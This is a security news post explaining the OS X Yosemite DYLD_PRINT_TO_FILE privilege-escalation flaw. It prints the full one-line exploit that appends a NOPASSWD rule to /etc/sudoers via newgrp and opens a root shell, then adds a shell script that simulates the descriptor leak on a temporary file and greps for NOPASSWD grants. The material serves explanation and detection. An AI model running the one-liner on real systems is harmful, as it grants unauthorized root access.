Yesterday information was published online through www.theregister.co.uk discussing a vulnerability discovered in the Mac OS X 10.10 Yosemite operating system. The flaw allows a local, unprivileged user to gain root access on a machine without any admin credentials. It is triggered through an environment variable called DYLD_PRINT_TO_FILE, which was added in Yosemite and tells the dynamic linker (dyld) which file to write its error messages to. It was discovered, however, that dyld honours the variable even when it is loading a setuid-root program, without checking that the user is allowed to write to that file, so the variable can be used maliciously to append to files owned by the root account. The bottom line is that with one basic line of shell a malware author could grant the compromised user account passwordless sudo, giving it full rein over the system.
While this exploit has not yet been seen implemented in any new malware in the wild, it is important to be aware that such a serious vulnerability exists. As usual, Mac users should exercise prudence when downloading and installing software onto their machines, and should run a reliable internet security app. Note that the vulnerability is not present in older versions of OS X such as Mavericks, which predate the DYLD_PRINT_TO_FILE variable, and it is not present in the 10.11 beta of El Capitan either.
The exploit is a single line. It pipes a shell command into newgrp, a setuid-root binary. With DYLD_PRINT_TO_FILE set, dyld opens /etc/sudoers for writing inside that root-privileged process (as file descriptor 3 here), and the shell that newgrp launches inherits the descriptor, so the piped command's >&3 appends a NOPASSWD rule for the current user. The trailing sudo -s then gives a root shell with no password prompt:
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
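To see why that one-liner works without touching a real sudoers file, here is an added example (not code from the original post or from the researcher who found the bug) that reproduces the descriptor-inheritance primitive with an ordinary file and an ordinary shell standing in for /etc/sudoers and the setuid newgrp binary, and then runs the check an incident responder would want: listing NOPASSWD grants in a sudoers-style file. It assumes (the page does not state it) that dyld opens the log file for append, so the leaked descriptor can only add lines. The sample sudoers content is constructed for the demo.

```shell
#!/bin/sh
# Added example, not the original post's exploit and not Apple's or dyld's code.
#
#   simulate_fd_leak  reproduces the primitive behind the exploit: a parent opens
#                     a file on descriptor 3, and a child that never opened the
#                     file itself writes to it through the inherited descriptor.
#   nopasswd_grants   detection: lists NOPASSWD grants in a sudoers-style file.
#
# Assumption (not stated on the page): dyld opens DYLD_PRINT_TO_FILE for append,
# so the stand-in redirection below is `3>>`, not `3>`.

# simulate_fd_leak TARGET USER
# The `3>>"$target"` redirection plays the part of dyld opening the log file on
# descriptor 3 inside the setuid process. The inner sh never opens TARGET; like
# the shell newgrp spawns, it only inherits fd 3, and `>&3` sends the same
# sudoers line the real exploit writes.
simulate_fd_leak() {
    target=$1
    user=$2
    sh -c 'echo "$1 ALL=(ALL) NOPASSWD:ALL" >&3' _ "$user" 3>>"$target"
}

# nopasswd_grants FILE
# Prints every line of FILE that carries a NOPASSWD tag outside a comment and
# exits 0 if any were found, 1 otherwise. Lines starting with # are skipped,
# as sudo itself ignores them.
nopasswd_grants() {
    grep -E '^[^#]*NOPASSWD' "$1"
}

# Demo against a constructed sudoers file; the real /etc/sudoers is never touched.
demo() {
    tmp=$(mktemp)
    cat >"$tmp" <<'EOF'
# Constructed sample: stock-looking sudoers with no passwordless grants
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
EOF
    echo "before:"
    nopasswd_grants "$tmp" || echo "  (no NOPASSWD grants)"
    simulate_fd_leak "$tmp" "$(id -un)"
    echo "after:"
    nopasswd_grants "$tmp"
    rm -f "$tmp"
}

demo
```

On a patched system the same DYLD_PRINT_TO_FILE trick fails because dyld no longer honours the variable for setuid programs; the detection half still applies, since an attacker who got in before the fix leaves exactly the kind of line nopasswd_grants reports.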